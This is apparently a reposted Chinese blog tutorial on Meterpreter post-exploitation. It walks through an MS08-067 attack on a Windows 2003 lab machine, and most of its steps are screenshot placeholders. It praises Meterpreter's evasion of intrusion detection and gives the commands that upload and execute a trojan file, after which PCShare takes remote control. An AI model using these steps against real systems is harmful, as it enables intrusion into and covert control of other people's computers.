meterpreter后期攻击使用方法

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。Meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。

今天复现一个windows 2003的漏洞,代号为ms08-067
使用工具:Kali 、msfconsole、pcshare、windows 2003
具体步骤如下。

## 1.kali系统进入msfconsole

meterpreter后期攻击使用方法插图

## 2.搜索病毒代号输入search ms08-067

meterpreter后期攻击使用方法插图1
meterpreter后期攻击使用方法插图2

3.设置被攻击者的ip,也就是win2003的ip地址

meterpreter后期攻击使用方法插图3
meterpreter后期攻击使用方法插图4
meterpreter后期攻击使用方法插图5
meterpreter后期攻击使用方法插图6

4.开始攻击,显示攻击成功

meterpreter后期攻击使用方法插图7

5.回到物理主机制造木马,同时上传到被攻击电脑windows 2003 1. c盘

meterpreter后期攻击使用方法插图8
meterpreter后期攻击使用方法插图9
meterpreter后期攻击使用方法插图10
meterpreter后期攻击使用方法插图11

6.输入以下命令将木马文件上传到被攻击者的电脑C盘,然后运行,具体看下面图片

upload //root//muma-xiao.exe c:muma-xiao.exe
execute -f c://muma-xiao.exe
meterpreter后期攻击使用方法插图12

总结:以上操作完毕后,win2003的c盘里就有了木马,名称为muma-xiao.exe,kali远程执行木马后,然后打开pcshare工具,即可以在图形化界面操控windows2003电脑

文章来源于互联网:meterpreter后期攻击使用方法

THE END
分享
二维码